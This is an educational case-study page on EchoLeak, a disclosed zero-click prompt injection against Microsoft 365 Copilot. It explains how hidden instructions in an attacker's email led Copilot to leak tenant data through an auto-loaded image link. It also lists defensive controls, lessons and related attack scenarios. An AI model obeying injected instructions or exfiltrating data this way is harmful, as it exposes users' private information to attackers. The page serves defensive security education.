🔍AI RiskAtlas
← Real-world cases
Case study

EchoLeak — Microsoft 365 Copilot zero-click (CVE-2025-32711)

Disclosed vulnerability11 Jun 2025🗺️ Tool-Using Agent

A crafted email's hidden instructions made M365 Copilot exfiltrate tenant data via an auto-rendered image URL — with no user click.

Root cause — why it happened

Copilot reads your company data — emails, files — to answer your questions. An attacker emailed the victim a message with hidden instructions. Later, when Copilot pulled that email into its context to help with a normal request, it followed the hidden instructions and packed private data into a web link for an image. The victim's app automatically loaded that image to show it — and that quiet, automatic load sent the data to the attacker. No click required.

Risks this case illustrates

Named in the standard (OWASP/ATLAS/NIST) lens. Click a highlighted component in the diagram below to see which risks attach where.

How it unfolded

UntrustedAgent coreOversightThe real worldgoal🧑User🎛️Orchestrator /Agent Loop🧠LLM🔐Identity &Permissions🔧Tool RuntimeHuman ApprovalGate🔌External APIs🗄️BusinessDatabase🌐UntrustedContent📝Audit Logging🌐Attacker'semail (in🌐Attacker server
InstructionsDataActionsControl / decisionFeedback / logs
👆 Click a component to inspect its risks
SetupStep 1 / 6

An ordinary request to Copilot

The victim asks Copilot something completely normal — to help summarise recent emails or pull together notes. Nothing about the request is suspicious. The attacker's email is already sitting in the mailbox from earlier.

💬User's requestprompt
Copilot, can you summarise my recent emails about the Q3 budget and list any action items?
Step 1 / 6

Controls & guardrails — what would have stopped it

The fix that actually closes this: don't let the AI's answer automatically reach out to any web address. If the app only auto-loads images from a short list of trusted places — and treats everything the AI writes as untrusted — then even a tricked Copilot can't smuggle data out through an image link.

Preventive
  • Egress allowlisting & DLP on tool arguments

    Allowlists fight an open-ended channel; legitimate-but-broad destinations (any URL fetch, any email) are hard to constrain without breaking usefulness. Encoding can evade naive DLP.

  • Delimiting / spotlighting of untrusted content

    A trained convention, not enforcement. Determined payloads still break out, especially when content is long or the attack is novel. Combine with action-layer controls.

  • Least-privilege identity & scoped credentials

    Doesn't prevent manipulation — only caps its reach. Hard to get right operationally; over-broad scopes are the common real-world failure.

Detective
Corrective
  • Governance: risk assessment, red-teaming & incident response

    Process reduces likelihood and speeds recovery but executes no technical control itself; weak follow-through makes it theatre.

  • Loop/cost circuit-breakers & consistency checks

    Thresholds are blunt — too tight breaks legitimate long tasks, too loose lets damage accrue first. Catches runaway dynamics, not a single well-formed bad decision.

Lessons

  • Zero-click is possible whenever untrusted content is auto-retrieved into context and model output can trigger an automatic outbound fetch.
  • Treat model output as untrusted: anything it can make the client auto-fetch (images, links, previews) is an exfiltration channel.
  • Input-side injection classifiers (XPIA) lower probability but never reach zero — the durable control is an egress boundary on auto-rendered content.
  • Retrieval over a user's whole mailbox/graph co-locates attacker content with secrets; scope and provenance-tag what enters context.

Practise the risk class — related scenarios

📧The Email That Gave Orders

A support email hides instructions — and the assistant obeys them

🕵️Lies in the Loop

A poisoned issue makes the agent lie to the human who approves its actions

👂Overheard Through the Cache

A speed optimisation becomes a cross-tenant listening device

🪟Stealing the Model

Two doors to the same secret: reconstruct the model through its API, or just walk off with the weight file

🪤The Bug Report That Ran Code

A fake Sentry error report hijacks a developer's coding agent into running a shell command

📼The Compromised Flight Recorder

The forensic record is itself the attack surface — an agent's log is poisoned, then quietly rewritten

👁️The Invisible Webpage Command

A shopping page tells the agent to do something the user never asked for

🧠The Memory That Wouldn't Die

A single poisoned document plants a standing instruction that survives every reset

🖼️The Picture That Whispered

A screenshot that's harmless at full size becomes an order once the system shrinks it

🎫The Stolen Session

An attacker captures the agent's bearer token — and inherits its authority

🥸The Uninvited Agent

A forged peer registers on the agent directory — and the planner enlists it

🛡️The Watcher Watched

The eval gate that was supposed to catch the agent is itself the thing being attacked

🪪The Worker Who Spoke for the Boss

A poisoned web page hijacks a research agent — and the planner acts on its behalf

🖼️Zero-Click Leak by Picture

An inbox summary quietly ships a secret to an attacker's server

AI RiskAtlas is an educational model of how GenAI & agentic systems work and fail. Architectures and payloads are illustrative and simplified for learning — not operational guidance. Real-world cases are summarised from public reporting.

Sources & further reading →·Built by Shi Yuan ↗